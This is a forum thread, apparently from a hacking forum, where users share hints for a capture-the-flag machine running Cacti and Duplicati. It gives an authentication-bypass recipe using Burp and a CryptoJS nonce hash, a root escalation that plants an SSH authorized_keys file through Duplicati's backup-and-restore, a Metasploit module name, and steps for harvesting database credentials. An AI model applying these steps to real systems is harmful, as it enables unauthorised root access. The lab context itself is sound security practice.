[Unbutton8074]

can't import package in cacti why

multi/http/cacti_package_import_rce

just update to latest metasploit-framework from website

[teky]

this nonce shit is so frustrating

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.

[jsvensson]

for those who have trouble bypassing duplicati authentication
in burp you do intercept send login do forward copy session_nonce to noncedpwd command - substitute result to password - forward and then disable intercept
for getting shell as root:
generate ssh keys on your box - copy public key to some folder on box as authorized_keys, in duplicati create backup to backup this file and then restore it to /source/root/.ssh/ - now you should be able login with generated key as root

What are your steps to create the backup?

i think it should be clear what to do. But if you need details i did it like that:
on my kali: ssh-keygen -t rsa -b 4096 -f monitors
copy monitors.pub as authorized_keys to /home/marcus
in duplicati new backup - name for example TEST
destination to /source/tmp/test1
disable encrypting
source to /source/home/marcus/authorized_keys
disable automate backup
save and run backup
then restore from TEST
choose authorized_keys
destination choose /source/root/.ssh/
choose overwrite
run
then just do ssh root@ip -i file_with_key

---

this nonce shit is so frustrating

it's rather easy just do it with steps:
1. intercept in burp
2. login with some pass
3. forward login
4. copy session-nonce and decode it from url
5. put it in var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("your_nonce") + saltedpwd)).toString(CryptoJS.enc.Base64);
6. copy noncedpwd to password in intercepted request
7. forward
8. stop intercepting
you should be logged

[Eggsy]

ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 id_rsa
marcus@10.10.11.30: Permission denied (publickey).

anyone can help me with this?

[aasdawejkasjdkasd]

Yeah what guy above said. Make sure you're going into /source, that's where the system files are. For example, /root/root.txt doesn't exist, it's /source/root/root.txt

So you create a backup of the flag and store it on /source/tmp/test for example. Then you restore that backup and set the destination folder to another directory which you can access and you'll see the files there.

I'm not sure how you guys got marcus first... I got the www-data shell, used chisel to portforward duplicati and got root. Password and ssh wasn't working for marcus. I actually used duplicati to get marcus's id_rsa, but that was dumb and then I did the same for root

---

---

ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 id_rsa
marcus@10.10.11.30: Permission denied (publickey).

anyone can help me with this?

Missing -i before id_rsa

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[N3rdyN3xus]

chmod 600 id_rsa

[jsvensson]

Yeah what guy above said. Make sure you're going into /source, that's where the system files are. For example, /root/root.txt doesn't exist, it's /source/root/root.txt

So you create a backup of the flag and store it on /source/tmp/test for example. Then you restore that backup and set the destination folder to another directory which you can access and you'll see the files there.

I'm not sure how you guys got marcus first... I got the www-data shell, used chisel to portforward duplicati and got root. Password and ssh wasn't working for marcus. I actually used duplicati to get marcus's id_rsa, but that was dumb and then I did the same for root

---

---

ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 id_rsa
marcus@10.10.11.30: Permission denied (publickey).

anyone can help me with this?

Missing -i before id_rsa

to get marcus just need to read i think path is /var/www/html/cacti/include/config.php with cacti db creds and then use mysql to get hash for marcus password, crack it then in shell su marcus(ssh is only avaible with key) - from it you could copy his id_rsa

[Eggsy]

Yeah what guy above said. Make sure you're going into /source, that's where the system files are. For example, /root/root.txt doesn't exist, it's /source/root/root.txt

So you create a backup of the flag and store it on /source/tmp/test for example. Then you restore that backup and set the destination folder to another directory which you can access and you'll see the files there.

I'm not sure how you guys got marcus first... I got the www-data shell, used chisel to portforward duplicati and got root. Password and ssh wasn't working for marcus. I actually used duplicati to get marcus's id_rsa, but that was dumb and then I did the same for root

---

---

ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 id_rsa
marcus@10.10.11.30: Permission denied (publickey).

anyone can help me with this?

Missing -i before id_rsa

oh! Thank you it works now. I might need a sleep xd

[f4k3h4ck3r]

var saltedpwd = 'HexOutputFromCyberChef'; // Replace with the Hex output from step 6
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64); // Replace 'NonceFromBurp' with the intercepted nonce
console.log(noncedpwd);


need help after this?????

I'm also stuck here, bypass is not working with me

It didn't work here either =\

console.log(CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("r5Xf9war2EPduVIifCAVQqsUOcYLnSPpYFfW9LGONEA=")+"59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64));

This also did not worked

This looks correct, make sure you use the correct nonce for your session

Everything was correct  but still did not worked for me

[rootme1122]

I'm also stuck here, bypass is not working with me

It didn't work here either =\

console.log(CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("r5Xf9war2EPduVIifCAVQqsUOcYLnSPpYFfW9LGONEA=")+"59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64));

This also did not worked

This looks correct, make sure you use the correct nonce for your session

Everything was correct  but still did not worked for me

same here Login failed: Unauthorized